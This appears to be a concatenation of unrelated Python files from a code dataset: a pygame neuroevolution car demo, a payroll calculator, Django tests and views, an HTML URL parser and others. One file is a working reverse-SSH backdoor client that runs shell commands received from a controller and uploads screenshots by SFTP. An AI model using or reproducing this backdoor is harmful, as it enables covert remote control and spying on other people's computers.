#ax.set_ylim([0,100])
#ax.set_xticks(np.arange(5) + 0.42)
#ax.set_xticklabels(('Adopted','Died','Transfered','Returned', 'Euthanized'))
#plt.show()
#fig, ax = plt.subplots()
#bars = ax.bar(np.arange(5), percentageAfternoonCatsOutcomes)
#ax.set_ylabel('Percentage')
#ax.set_title('Percentage Afternoon Cat Outcomes')
#ax.set_ylim([0,100])
#ax.set_xticks(np.arange(5) + 0.42)
#ax.set_xticklabels(('Adopted','Died','Transfered','Returned', 'Euthanized'))
#plt.show()
#fig, ax = plt.subplots()
#bars = ax.bar(np.arange(5), percentageNightCatsOutcomes)
#ax.set_ylabel('Percentage')
#ax.set_title('Percentage Night Cat Outcomes')
#ax.set_ylim([0,100])
#ax.set_xticks(np.arange(5) + 0.42)
#ax.set_xticklabels(('Adopted','Died','Transfered','Returned', 'Euthanized'))
#plt.show()
import pygame
import random
import math
# Setup pygame
pygame.init()
# 800x600 window; add pygame.FULLSCREEN to the call to go fullscreen.
screen = pygame.display.set_mode((800, 600))#, pygame.FULLSCREEN)
myfont = pygame.font.SysFont("monospace", 12)  # HUD font
clock = pygame.time.Clock()  # used to cap the main loop at 60 FPS
# Track image ('bane' is Danish for 'track'); black pixels are road.
bane = pygame.image.load('bane2.png')
# Initialize game variables
done = False  # main-loop exit flag
tilstand = 1  # UI state ('tilstand' = 'state'): 1 = game view, 0 = menu
class Car():
    """A car steered by a single-neuron network.

    ``weights`` is a list of 6 floats: the first 5 multiply the five
    distance-sensor inputs and the last one is a bias term.
    """

    def __init__(self, weights):
        self.pos = [0, 250]     # x, y position in track-image pixels
        self.dir = 0            # heading in radians (0 = facing right)
        self.weights = weights
        self.steer = 0          # last steering output, shown on the HUD

    def update(self, inputs):
        """Advance one step: steer from the sensor readings, then move 1 px."""
        self.steer = self.evaluate(inputs)
        # Accumulate steering into the heading, clamped to +/-1.5 rad so
        # the car cannot spin in place.
        self.dir = max(-1.5, min(1.5, self.dir + self.steer))
        self.pos[0] += math.cos(self.dir)
        self.pos[1] += math.sin(self.dir)

    def dot(self, l1, l2):
        """Return the dot product of two equal-length sequences."""
        return sum(a * b for a, b in zip(l1, l2))

    def evaluate(self, inputs):
        """Map sensor inputs to a steering delta in (-0.05, 0.05).

        A logistic squash of the weighted input sum (plus bias), shifted
        so a zero activation produces zero steering.
        (Bug fix: removed a leftover debug ``print(x)`` that ran every
        simulation tick.)
        """
        x = self.dot(inputs, self.weights[0:len(inputs)]) + self.weights[-1]
        L = 0.1  # total output range
        k = 1    # sigmoid steepness
        return (L / (1 + math.exp(-k * x))) - 0.05
class Game():
    """Evolutionary training environment for a single Car on a track image.

    The track is the global pygame surface ``bane``; pixels equal to
    (0, 0, 0, 255) count as drivable road.  Each car runs until it drives
    off the road or reaches x > 550; its fitness is how far right it got.
    Finished cars join ``population``, from which new weight vectors are
    bred by crossover and mutation.

    (Methods now use ``self`` where the original referenced the global
    ``game`` — always this same, single instance.)
    """

    def __init__(self, width, height):
        self.w = width   # NOTE(review): width/height appear unused in this file
        self.h = height
        # Start from a random individual; each weight is in [-0.5, 0.5).
        self.car = Car([random.random()-0.5 for i in range(6)])
        self.latest_input = []   # last sensor readings, shown on the HUD
        self.points = []         # sensor-ray end points, drawn as dots
        self.population = []     # list of (weights, fitness) tuples
        self.avg = 0             # mean fitness of the kept population

    def get_weights_by_selection(self):
        """Breed a child weight vector from two randomly chosen parents.

        Uniform crossover (each gene from either parent with equal
        probability) followed by a small per-gene mutation chance.
        """
        c1 = random.choice(self.population)
        c2 = random.choice(self.population)
        weights = [0 for i in range(len(c1[0]))]
        for i in range(len(c1[0])):
            if random.random() > 0.5:
                weights[i] = c1[0][i]
            else:
                weights[i] = c2[0][i]
            # BUG FIX: the original test was `random.random() > 0.01`,
            # which replaced ~99% of genes with fresh noise and reduced
            # the GA to random search.  Mutate with 1% probability.
            if random.random() < 0.01:
                weights[i] = random.random()-0.5
        return weights

    def update(self):
        """Advance the simulation one tick: sense, steer, score, respawn."""
        inputs = []
        self.points = []
        # Cast five rays at -60, -30, 0, +30, +60 degrees relative to the
        # heading; measure distance (capped at 150 px) to the first
        # non-road pixel.
        for v in [-math.pi/3, -math.pi/6, 0, math.pi/6, math.pi/3]:
            l = 1
            x = self.car.pos[0] + l * math.cos(v + self.car.dir)
            y = self.car.pos[1] + l * math.sin(v + self.car.dir)
            c = bane.get_at((int(x), int(y)))
            while c == (0, 0, 0, 255) and l < 150:
                x = self.car.pos[0] + l * math.cos(v + self.car.dir)
                y = self.car.pos[1] + l * math.sin(v + self.car.dir)
                try:
                    c = bane.get_at((int(x), int(y)))
                except IndexError:
                    # Off-image pixels count as road, so the ray simply
                    # runs out to its maximum length.
                    c = (0, 0, 0, 255)
                l += 1
            self.points.append((x, y))
            inputs.append(l/100)   # normalise distance to roughly [0, 1.5]
        self.latest_input = inputs
        self.car.update(inputs)
        # Episode over: car finished (x > 550) or drove off the road.
        if self.car.pos[0] > 550 or bane.get_at((int(self.car.pos[0]), int(self.car.pos[1]))) != (0, 0, 0, 255):
            self.population.append((self.car.weights, self.car.pos[0]))
            if len(self.population) > 100:
                # Keep only the 100 fittest individuals, best first.
                self.population.sort(key=lambda ind: ind[1], reverse=True)
                self.population = self.population[0:100]
                self.avg = sum(ind[1] for ind in self.population) / 100
            # Respawn with random weights, or — once enough individuals
            # exist — half the time with weights bred from the population.
            self.car = Car([random.random()-0.5 for i in range(6)])
            if len(self.population) > 50 and random.random() > 0.5:
                self.car.weights = self.get_weights_by_selection()
# The single global Game instance (its width/height arguments appear
# unused elsewhere in this file).
game = Game(500,500)
def draw_game():
    """Render one frame: track, car, sensor-ray hit points and HUD text."""
    # Clear the whole window, then draw the track image at the origin.
    pygame.draw.rect(screen, (0,0,0), pygame.Rect(0,0,800,600))
    screen.blit(bane, [0, 0])
    # The car is a 12-px white dot centred on its position.
    pygame.draw.ellipse(screen, (255,255,255), pygame.Rect(game.car.pos[0]-6, game.car.pos[1]-6,12,12))
    # HUD: sensor inputs, steering output, sim speed and fitness stats.
    screen.blit(myfont.render("inputs: {}".format(game.latest_input), 0, (255,255,255)), (20,20))
    screen.blit(myfont.render("output: {:0.2f}".format(game.car.steer), 0, (255,255,255)), (20,40))
    #screen.blit(myfont.render("network: {}".format(game.car.weights), 0, (255,255,255)), (20,60))
    screen.blit(myfont.render("speed: {}".format(speed), 0, (255,255,255)), (20,80))
    screen.blit(myfont.render("Average fitness: {}".format(game.avg), 0, (255,255,255)), (20,100))
    if len(game.population) > 0:
        # NOTE(review): population[0] is only the best individual after
        # Game.update sorts (which happens once it exceeds 100 entries);
        # before that this shows the first finisher, not the maximum.
        screen.blit(myfont.render("Max fitness: {}".format(game.population[0][1]), 0, (255,255,255)), (20,120))
    # Mark where each sensor ray ended.
    for p in game.points:
        pygame.draw.ellipse(screen, (200,100,200), pygame.Rect(p[0],p[1], 5, 5))
def output_logic(tilstand):
    """Render the screen that matches the current UI state.

    State 1 is the running simulation, state 0 the (empty) menu.
    """
    if tilstand == 0:
        draw_menu()
    elif tilstand == 1:
        draw_game()
def draw_menu():
    """Placeholder for the menu screen; nothing is drawn yet."""
    return None
speed = 1  # simulation ticks per rendered frame
#Main game loop
while not done:
    for event in pygame.event.get():
        # Window close or ESC quits.
        if event.type == pygame.QUIT or (event.type == pygame.KEYDOWN and event.key == pygame.K_ESCAPE):
            done = True
        # Q/W switch between the two track images.
        if (event.type == pygame.KEYDOWN and event.key == pygame.K_q):
            bane = pygame.image.load('bane3.png')
        if (event.type == pygame.KEYDOWN and event.key == pygame.K_w):
            bane = pygame.image.load('bane2.png')
        # A/S decrease/increase the simulation speed.
        # NOTE(review): speed can drop to 0 or below, which pauses the
        # simulation (range(speed) becomes empty) — confirm intended.
        if (event.type == pygame.KEYDOWN and event.key == pygame.K_a):
            speed -= 1
        if (event.type == pygame.KEYDOWN and event.key == pygame.K_s):
            speed += 1
        # Handling of mouse input (position is read but currently unused).
        if event.type == pygame.MOUSEBUTTONDOWN:
            pos = pygame.mouse.get_pos()
    # Run several simulation steps per rendered frame so evolution can be
    # fast-forwarded.
    for i in range(speed):
        game.update()
    output_logic(tilstand)
    # pygame commands to show the graphics and update 60 times per second.
    pygame.display.flip()
    clock.tick(60)
|
# This program allows the user to input
# an employee's salary for SoftwarePirates Inc.
'''
====================================================
-------------------- Begin Main --------------------
====================================================
'''
# Global constants
ERROR = "\n⭕ ERROR:"  # prefix for user-facing validation error messages
# The main function.
def main():
    """Run one salary-entry session, then print a farewell banner."""
    employee_salary()
    print('⬐-----------------------------⬎')
    print(' Bye! 🎃 ')
    print('⬑-----------------------------⬏')
# The employee_salary function.
def employee_salary(ask_again = True):
    """Interactively collect one employee's name, hours worked and hourly pay,
    then print a gross/net salary breakdown with all deductions.

    ask_again: when True, offer to enter another employee afterwards.
    NOTE(review): the recursive re-entry call below passes no argument, so
    ask_again is effectively always True on repeats — confirm intent.
    """
    employee_name = input_employee_name(3)
    if employee_name != '':
        worked_hours = input_worked_hours(employee_name)
        if worked_hours != None:
            hour_pay = input_hour_pays(employee_name)
            if hour_pay != None:
                # Gross pay, deduction breakdown and resulting net pay.
                gross_salary = worked_hours * hour_pay
                each_deduction = calculate_deductions(gross_salary)
                net_salary = gross_salary - each_deduction['deductions']
                print()
                print("The employee's name is ", employee_name, ".", sep = "")
                print(" ⦧ Gross salary: ", format_to_currency(gross_salary), \
                    " (hours worked is ", worked_hours, " and an hourly pay rate is ", format_to_currency(hour_pay), ")", sep = "")
                print(" ⦙ Deductions: ", format_to_currency(each_deduction['deductions']), sep = "\t")
                print(" ⦙ ⧁ Income tax: ", format_to_currency(each_deduction['tax_rate']), sep = "\t")
                print(" ⦙ ⧁ Social security tax: ", format_to_currency(each_deduction['social_security_rate']), sep = "\t")
                print(" ⦙ ⧁ Medical plan: ", format_to_currency(each_deduction['medical_rate']), sep = "\t")
                print(" ⦙ ⧁ Retirement.: ", format_to_currency(each_deduction['retirement_rate']), sep = "\t")
                print(" ⦦ Net salary: ", format_to_currency(net_salary), sep = "\t")
        if ask_again:
            print()
            again = str(input("Do you want to input another emplayee's salary? (y/n): ")).lower() == 'y'
            if again:
                print()
                employee_salary()
# The format_to_currency function.
def format_to_currency(number):
    """Render *number* as a dollar amount with thousands separators and two
    decimals, e.g. 1234.5 -> '$1,234.50'."""
    return f"${number:,.2f}"
# The input_employee_name function.
def input_employee_name(count, message = ''):
    """Prompt for an employee name, retrying up to *count* times.

    Returns the entered name, or '' when all attempts were left blank.
    *message* is an internal parameter carrying the retry warning.
    """
    if count == 0:
        # All attempts exhausted: give up with an empty name.
        print (ERROR, " must have an employee's name!")
        print()
        return ''
    else:
        if message != '':
            print()
            print(message)
        name = str(input("Please enter an employee's name: "))
        if name == '':
            # The old `cond and a or b` ternary idiom — safe here only because
            # the middle operand is a non-empty (truthy) string.
            message = "Did't enter an employee's name! " + (count == 2 and "☞ 🔥 This is last chance!" or "")
            return input_employee_name(count - 1, message)
        else :
            return name
# The input_worked_hours function.
def input_worked_hours(employee_name, less_value = 10):
    """Prompt for the hours worked by *employee_name*.

    Returns the hours as a float when >= *less_value*; returns None
    (implicitly) when the input is not a number or below the minimum.
    """
    try:
        hours = float(input("Please enter " + employee_name + "'s hours worked: "))
        if hours < less_value:
            print(ERROR, 'hours worked must be large than or equal to', less_value)
            print()
        else:
            # Values above a full month (31 days * 24 h) are accepted but
            # flagged with a playful warning.
            max_value = 31 * 24
            if hours > float(max_value):
                print(" 💭 " + employee_name + " hard work! (☞ ❤️ Up to", max_value, "hours a month)")
            return hours
    except ValueError:
        print(ERROR, 'hours worked must be valid numbers.')
        print()
# The input_hour_pays function.
def input_hour_pays(employee_name, less_value = 9):
    """Prompt for *employee_name*'s hourly pay rate.

    Returns the rate as a float when >= *less_value*; returns None
    (implicitly) when the input is not a number or below the minimum.
    """
    try:
        rate = float(input("Please enter an hourly pay rate for " + employee_name + ": "))
        if rate < less_value:
            print(ERROR, ' an hourly pay rate must be large than or equal to $', less_value, sep = '')
            print()
        else:
            return rate
    except ValueError:
        print(ERROR, 'an hourly pay rate must be valid numbers.')
        print()
def calculate_deductions(gross_salary):
    """Return the payroll deduction breakdown for a gross monthly salary.

    The result dict holds 'tax_rate', 'social_security_rate', 'medical_rate',
    'retirement_rate' (non-zero only in the top bracket) and their total under
    'deductions'.
    """
    result = {'tax_rate': 0, 'social_security_rate': 0,
              'medical_rate': 0, 'retirement_rate': 0,
              'deductions': 0}
    # (exclusive upper bound, income tax, social security, medical, retirement)
    brackets = (
        (4000.0, 0.12, 0.04, 0.01, None),
        (8000.0, 0.2, 0.07, 0.03, None),
        (16000.0, 0.3, 0.09, 0.05, None),
        (float('inf'), 0.38, 0.11, 0.07, 0.06),
    )
    for upper, tax, social, medical, retirement in brackets:
        if gross_salary < upper:
            result['tax_rate'] = gross_salary * tax
            result['social_security_rate'] = gross_salary * social
            result['medical_rate'] = gross_salary * medical
            if retirement is not None:
                result['retirement_rate'] = gross_salary * retirement
            break
    result['deductions'] = result['tax_rate'] + result['social_security_rate'] + \
        result['medical_rate'] + result['retirement_rate']
    return result
# Call the main function.
main()
'''
∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎
--------------------- End Main ---------------------
∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎∎
'''
|
12,756 | 8ca9b552a7e3784acef967f3a6bda78daf545c6d | #!/usr/bin/env python3
import subprocess
import paramiko
from PIL import ImageGrab
HOST = "127.0.0.1"
USERNAME = "root"
PASSWORD = "toor"
PORT = 8080
NAME = "001"
def main():
    """Connect back to the control server over SSH and run received commands.

    Each command arriving on the channel is executed through the shell and its
    output (or the exception text on failure) is sent back.

    NOTE(review): the `while True` loop has no break, so `client.close()`
    below is unreachable — confirm whether a disconnect condition is missing.
    """
    client = paramiko.SSHClient()
    # Accept unknown host keys automatically (no known_hosts verification).
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    client.connect(HOST, port=PORT, username=USERNAME, password=PASSWORD, compress=True)
    chan = client.get_transport().open_session()
    chan.send("Client " + NAME + " is connected")
    while True:
        command = chan.recv(1024).decode()
        try:
            # SECURITY: executes whatever the server sends via the shell —
            # that is this tool's purpose, but it is fully trusting the server.
            cmd = subprocess.check_output(command, shell=True)
            chan.send(cmd)
        except Exception as exc:
            chan.send(str(exc))
        print(str(chan.recv(1024)))
    client.close()
def sftp(local_path, name):
    """Upload the file at *local_path* to the server as *name* via SFTP.

    Returns a success marker string, or the exception text on failure.
    NOTE(review): the transport is not closed when an exception occurs
    mid-transfer — confirm whether that leak matters here.
    """
    try:
        transport = paramiko.Transport((HOST, PORT))
        transport.connect(username=USERNAME, password=PASSWORD)
        sftp_client = paramiko.SFTPClient.from_transport(transport)
        sftp_client.put(local_path, name)
        sftp_client.close()
        return "[+] Done!"
    except Exception as exc:
        return str(exc)
def screenshot():
    """Capture the screen to C:\\screenshot.png and upload it via sftp().

    Returns sftp()'s status string, or the exception text if the capture or
    save fails (the hard-coded path assumes a writable Windows C: root).
    """
    try:
        img = ImageGrab.grab()
        img.save("C:\\screenshot.png")
    except Exception as exc:
        return str(exc)
    return sftp("C:\\screenshot.png", "screenshot")
if __name__ == "__main__":
main() |
12,757 | e54b1fb269aeecf00d4d701a4bae104b59de2f79 | from django.test import TestCase
from six import StringIO
from django.core.management import call_command
from algoliasearch_django import algolia_engine
from algoliasearch_django import get_adapter
from algoliasearch_django import clear_index
from .models import Website
from .models import User
class CommandsTestCase(TestCase):
    """Exercise the algoliasearch_django management commands
    (reindex / clearindex / applysettings), with and without the ``model``
    restriction, by asserting on the text each command writes to stdout.

    The original file repeated the same try/``assertRegex``/except
    ``AttributeError`` fallback eight times; that pattern is factored into
    the ``_assert_regex`` / ``_assert_not_regex`` helpers below.
    """

    @classmethod
    def tearDownClass(cls):
        # Delete the remote Algolia indices created for the test models.
        user_index_name = get_adapter(User).index_name
        website_index_name = get_adapter(Website).index_name
        algolia_engine.client.init_index(user_index_name).delete()
        algolia_engine.client.init_index(website_index_name).delete()

    def setUp(self):
        # Create some records
        User.objects.create(name='James Bond', username="jb")
        User.objects.create(name='Captain America', username="captain")
        User.objects.create(name='John Snow', username="john_snow",
                            _lat=120.2, _lng=42.1)
        User.objects.create(name='Steve Jobs', username="genius",
                            followers_count=331213)
        self.out = StringIO()

    def tearDown(self):
        clear_index(Website)
        clear_index(User)

    # --- helpers ---------------------------------------------------------

    def _assert_regex(self, text, regex):
        # assertRegex, falling back to the pre-Python-3.2 spelling.
        try:
            self.assertRegex(text, regex)
        except AttributeError:
            self.assertRegexpMatches(text, regex)

    def _assert_not_regex(self, text, regex):
        # assertNotRegex, falling back to the pre-Python-3.2 spelling.
        try:
            self.assertNotRegex(text, regex)
        except AttributeError:
            self.assertNotRegexpMatches(text, regex)

    # --- tests -----------------------------------------------------------

    def test_reindex(self):
        call_command('algolia_reindex', stdout=self.out)
        result = self.out.getvalue()
        self._assert_regex(result, r'Website --> 0')
        self._assert_regex(result, r'User --> 4')

    def test_reindex_with_args(self):
        call_command('algolia_reindex', stdout=self.out, model=['Website'])
        result = self.out.getvalue()
        self._assert_regex(result, r'Website --> \d+')
        self._assert_not_regex(result, r'User --> \d+')

    def test_clearindex(self):
        call_command('algolia_clearindex', stdout=self.out)
        result = self.out.getvalue()
        self._assert_regex(result, r'Website')
        self._assert_regex(result, r'User')

    def test_clearindex_with_args(self):
        call_command(
            'algolia_clearindex',
            stdout=self.out,
            model=['Website']
        )
        result = self.out.getvalue()
        self._assert_regex(result, r'Website')
        self._assert_not_regex(result, r'User')

    def test_applysettings(self):
        call_command('algolia_applysettings', stdout=self.out)
        result = self.out.getvalue()
        self._assert_regex(result, r'Website')
        self._assert_regex(result, r'User')

    def test_applysettings_with_args(self):
        call_command('algolia_applysettings', stdout=self.out,
                     model=['Website'])
        result = self.out.getvalue()
        self._assert_regex(result, r'Website')
        self._assert_not_regex(result, r'User')
12,758 | ed30400b87b830816e38fc40b78b3adc86dd1543 | from copy import deepcopy
from .strategy import FormatStrategy
from collections import OrderedDict
class MultiWayPlayerBetStrategy(FormatStrategy):
    """Format strategy that groups parsed markets under each player's name
    for multi-way player bets."""

    def __init__(self, strategy):
        super().__init__(strategy)

    def append_market(self, caller, parsed_market) -> None:
        """Append *parsed_market* entries to the caller's response under
        (strategy -> player name -> 'markets' -> market name), creating the
        player entry on first use and de-duplicating identical market dicts.
        """
        # Idiom fix: `x not in ...` rather than `not x in ...`.
        if caller.player_name not in caller.response[self.strategy]:
            # First market for this player: seed the entry from the event
            # info and put 'playerName' first in the OrderedDict.
            entry = OrderedDict(deepcopy(caller.event_info))
            entry.update({'playerName': caller.player_name})
            entry.move_to_end('playerName', last=False)
            caller.response[self.strategy][caller.player_name] = entry
        caller.response[self.strategy][caller.player_name]['markets'][caller.market_name].extend(parsed_market)
        # Remove duplicates from market list.
        # NOTE(review): the set comprehension does not preserve the original
        # ordering of the market dicts — confirm callers don't rely on order.
        market_list = caller.response[self.strategy][caller.player_name]['markets'][caller.market_name]
        market_list = [
            dict(t) for t
            in {tuple(d.items())
                for d in market_list}
        ]
        caller.response[self.strategy][caller.player_name]['markets'][caller.market_name] = market_list
|
12,759 | bdec5d7b7202b28760769a570d60ab8c7b7d5d32 | def main():
a, oper, b = input().split(' ')
try:
if oper == "+":
c = int(a)+int(b)
print(c, sep='\n')
elif oper == "-":
c = int(a)-int(b)
print(c, sep='\n')
elif oper == "*":
c = int(a)*int(b)
print(c, sep='\n')
elif oper == "/":
c = int(a)//int(b)
print(c, sep='\n')
except:
print('Неправильно. Попробуйте ещё раз.')
main()
main()
|
12,760 | e80cb48752a11854ee9a5af36f1872860993021f | #!/usr/bin/python3
# -*- coding: utf-8 -*-
#
# @Time : 2019-08-16 11:18
# @Author : max
# @FileName: htmlparse.py
# @Software: PyCharm
import re
import warnings
warnings.filterwarnings('ignore')
from bs4 import BeautifulSoup
from urllib.parse import urlparse
exclude = ['javascript:;', '#']
# url所有后缀
suffix = ['html', 'htm', 'shtml', 'css', 'xml', 'gif', 'jpeg', 'jpg', 'js', 'atom',
'rss', 'mml', 'txt', 'jad', 'wml', 'htc', 'png', 'svg', 'svgz', 'tif',
'tiff', 'wbmp', 'webp', 'ico', 'jng', 'bmp', 'woff', 'woff2', 'jar', 'war',
'ear', 'json', 'hqx', 'doc', 'pdf', 'ps', 'eps', 'ai', 'rtf', 'm3u8', 'kml',
'kmz', 'xls', 'eot', 'ppt', 'odg', 'odp', 'ods', 'odt', 'pptx', 'docx', 'wmlc',
'7z', 'cco', 'jardiff', 'jnlp', 'run', 'pl', 'pm', 'prc','pdb', 'rar', 'rpm',
'sea', 'swf', 'sit', 'tcl', 'tk', 'der', 'pem', 'crt', 'xpi', 'xhtml', 'xspf',
'zip', 'bin', 'exe', 'dll', 'deb', 'dmg', 'iso', 'img', 'msi', 'msp', 'msm',
'mid', 'midi', 'kar', 'mp3', 'ogg', 'm4a', 'ra', '3gpp', '3gp', 'ts', 'mp4',
'mpeg', 'mpg', 'mov', 'webm', 'flv', 'm4v', 'mng', 'asx', 'asf', 'wmv', 'avi']
# url静态文件后缀
static_suffix = ['apk', 'css', 'xml', 'gif', 'jpeg', 'jpg', 'js', 'atom', 'rss',
'mml', 'txt','jad', 'wml', 'htc', 'png', 'svg', 'svgz', 'tif',
'tiff','wbmp', 'webp', 'ico', 'jng', 'bmp', 'woff', 'woff2',
'jar', 'war', 'ear','hqx', 'doc', 'pdf', 'ps', 'eps', 'ai',
'rtf', 'm3u8', 'kml', 'kmz', 'xls', 'eot', 'ppt','odg', 'odp',
'ods', 'odt', 'pptx', 'docx', 'wmlc', '7z', 'cco', 'jardiff',
'jnlp', 'run', 'pl', 'pm', 'prc','pdb', 'rar','rpm', 'sea', 'swf',
'sit', 'tcl', 'tk', 'der', 'pem', 'crt', 'xpi', 'xhtml', 'xspf',
'zip', 'bin', 'exe', 'dll', 'deb', 'dmg', 'iso', 'img', 'msi', 'msp',
'msm', 'mid', 'midi', 'kar', 'mp3', 'ogg', 'm4a', 'ra', '3gpp', '3gp',
'ts', 'mp4', 'mpeg', 'mpg', 'mov', 'webm', 'flv', 'm4v', 'mng', 'asx',
'asf', 'wmv', 'avi']
# 顶级域名后缀
top_domain_suffix = ('com', 'la', 'io', 'co', 'info', 'net', 'org', 'me', 'cn',
'mobi', 'us', 'biz', 'xxx', 'ca', 'co.jp', 'com.cn',
'net.cn', 'org.cn', 'mx', 'tv', 'ws', 'ag', 'com.ag',
'net.ag', 'org.ag', 'am', 'asia', 'at', 'be', 'com.br',
'net.br', 'bz', 'com.bz', 'net.bz', 'cc', 'com.co', 'net.co',
'nom.co', 'de', 'es', 'com.es', 'nom.es', 'org.es', 'eu',
'fm', 'fr', 'gs', 'in', 'co.in', 'firm.in', 'gen.in', 'ind.in',
'net.in', 'org.in', 'it', 'jobs', 'jp', 'ms', 'com.mx', 'nl',
'nu', 'co.nz', 'net.nz', 'org.nz', 'se', 'tc', 'tk', 'tw',
'com.tw', 'idv.tw', 'org.tw', 'hk', 'co.uk', 'me.uk', 'org.uk', 'vg')
class HtmlParse(object):
    """Thin wrapper around BeautifulSoup that extracts outgoing URLs from an
    HTML document (anchor, image, script and link tags)."""

    def __init__(self, text):
        # Keep the raw markup and a parsed soup.
        # NOTE(review): no explicit parser is passed to BeautifulSoup, so bs4
        # guesses the "best available" one (and normally warns about it; the
        # module-level warning filter suppresses that).
        self.__text = text
        self.soup = BeautifulSoup(text)

    @staticmethod
    def is_url(url):
        # A value counts as a URL when it is absolute http(s) or root-relative.
        if url:
            if re.match(r'^https?:/{2}\w.+$', url):
                return True
            elif url[0] == '/':
                return True
        return False

    @staticmethod
    def is_static(url):
        # True when the URL path's file extension is in the static-file list.
        u_parse = urlparse(url)
        index = u_parse.path.rfind('.') + 1
        if index and u_parse.path[index:] in static_suffix:
            return True
        return False

    def select_label(self, label, e = 'src'):
        """Collect attribute *e* of every <label> tag whose value is a URL."""
        urls = []
        for u in self.soup.find_all(label):
            url = u.get(e)
            if HtmlParse.is_url(url):
                urls.append(url)
        return urls

    @property
    def title(self):
        # NOTE(review): raises AttributeError when the document has no <title>.
        return self.soup.title.string

    @property
    def a_label(self):
        # href attributes of <a> tags.
        return self.select_label('a', 'href')

    @property
    def img_label(self):
        # src attributes of <img> tags.
        return self.select_label('img')

    @property
    def script_label(self):
        # src attributes of <script> tags.
        return self.select_label('script')

    @property
    def link_label(self):
        # href attributes of <link> tags.
        return self.select_label('link', 'href')

    @property
    def urls(self):
        """All URLs found in <a>, <img>, <script> and <link> tags, in that order."""
        urls = []
        urls.extend(self.a_label)
        urls.extend(self.img_label)
        urls.extend(self.script_label)
        urls.extend(self.link_label)
        return urls
12,761 | 1418f73449a6c5d59ee11df0c1e5a4b128b3269d | from django.shortcuts import render, get_object_or_404
from .models import Post, Comment
from .forms import CommentForm
from django.http import HttpResponseRedirect
# Create your views here.
def post(request, pk):
    """Display a single blog post and handle comment submission.

    GET renders the post with an empty CommentForm.  POST re-binds the form
    (CommentForm takes the author and post as extra constructor kwargs) and,
    when valid, saves the comment and redirects back to the same URL
    (POST/redirect/GET); when invalid, the bound form is re-rendered with
    its errors.
    """
    post = get_object_or_404(Post, pk=pk)
    form = CommentForm()
    if request.method == "POST":
        form = CommentForm(request.POST, author=request.user, post=post)
        if form.is_valid():
            form.save()
            return HttpResponseRedirect(request.path)
    return render(request, "blog/post.html", {"post": post, "form": form})
|
12,762 | 8d07d886a0f2d5ddc62a97bd1cd06ac40ae7101a | # -*- coding: utf-8 -*-
"""Top-level package for Analysis Schema."""
__author__ = """Matthew Turk"""
__email__ = "matthewturk@gmail.com"
__version__ = "0.1.0"
from . import server # noqa F401
from .schema_model import schema, ytModel # noqa F401
|
12,763 | 48bc6fac5cd0c29d08634efdc1dcfc29851d6da1 | N, M = map(int, input().split())
inf = int(1e10)
# dp over subsets: dp[i] is the minimum cost to reach key-subset i
# (each of the N treasure-box keys is one bit; 1 << N == 2**N states).
dp = [inf] * (1 << N) #1をNだけシフトする 2**B -> shift 1 left by N, i.e. 2**N
dp[0] = 0
# Set of subset states already reachable (seeded with the empty set).
bits = set()
bits.add(0)
for i in range(M):
    # a = price of this key bundle; b = how many boxes it opens.
    # NOTE(review): b is read but never used — the box list on the next
    # line carries the same information.
    a, b = map(int, input().split())
    c = list(map(int, input().split()))
    # Convert the box list c into a bitmask 'key'.
    key = 0
    for t in c:
        key += 1 << (t - 1)
    # Relax every reachable state with (state | key); newly improved
    # states are collected and added to the reachable set afterwards.
    add_bits = set()
    for bit in bits:
        tmp = bit | key
        if dp[bit] + a < dp[tmp]:
            dp[tmp] = dp[bit] + a
            add_bits.add(tmp)
    bits |= add_bits
# Full mask (all boxes opened) unreachable -> -1, else its minimum cost.
if dp[(1 << N) - 1] == inf:
    print(-1)
else:
    print(dp[(1 << N) - 1])
12,764 | 136c809241d9154339579bb643d89fe4ca0edd9f |
import sqlalchemy
from sqlalchemy.ext.declarative import declarative_base
# Define the MySQL engine using MySQL Connector/Python
engine = sqlalchemy.create_engine(
'mysql://root:password@localhost:3306/classicmodels',
echo=True)
# Define and create the table
Base = declarative_base()
class User(Base):
    """ORM mapping for the 'users' table."""

    __tablename__ = 'users'

    id = sqlalchemy.Column(sqlalchemy.Integer, primary_key=True)
    name = sqlalchemy.Column(sqlalchemy.String(length=50))
    fullname = sqlalchemy.Column(sqlalchemy.String(length=50))
    nickname = sqlalchemy.Column(sqlalchemy.String(length=50))

    def __repr__(self):
        # Same textual form as before, rendered with an f-string.
        return (f"<User(name='{self.name}', "
                f"fullname='{self.fullname}', nickname='{self.nickname}')>")
Base.metadata.create_all(engine)

# Create a session
# NOTE(review): this relies on `sqlalchemy.orm` being reachable as an
# attribute after `import sqlalchemy` (pulled in by the declarative import
# above) — an explicit `from sqlalchemy.orm import sessionmaker` would be
# more robust.
Session = sqlalchemy.orm.sessionmaker()
Session.configure(bind=engine)
session = Session()

# Add a user
jwk_user = User(name='jesper', fullname='Jesper Wisborg Krogh', nickname='ggg')
session.add(jwk_user)
session.commit()

# Query the user
our_user = session.query(User).filter_by(name='jesper').first()
print('\nOur User:')
print(our_user)
# NOTE(review): despite the label, this prints the UTF-8 *bytes* of the
# nickname (b'...'), not a hex string.
print('Nick name in hex: {0}'.format(our_user.nickname.encode('utf-8')))
|
12,765 | cf87b17466ef1cab226b8a301061137dfd12a833 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Feb 3 23:57:21 2021
@author: danney
"""
from distutils.core import setup
__version__ = "0.0"

setup(
    name="axispy",
    version=__version__,
    description="Object to use an AXIS Camera as OpenCV's VideoCapture",
    author="Dani Azemar",
    author_email="dani.azemar@gmail.com",
    packages=["axispy"],
    install_requires=["sensecam_control"],
    # BUG FIX: the extras_require dict was previously unterminated (the
    # closing '},' before classifiers= was missing), which made this file a
    # SyntaxError and setup.py unusable.
    extras_require={
        'dev': [
            'pytest',
            'python-dotenv'
        ]
    },
    classifiers=[
        "License :: MIT",
        # 'License :: Other/Proprietary License',
        "Programming Language :: Python :: 3.8+",
    ],
)
|
12,766 | 036ecf9002f255d9a69088cbfc2fc465a26cbd88 | from django.contrib import admin
from .models import tls_feature
from .models import flow_feature
from .models import image_feature
# Make the traffic-feature models editable in the Django admin site.
admin.site.register(tls_feature)
admin.site.register(flow_feature)
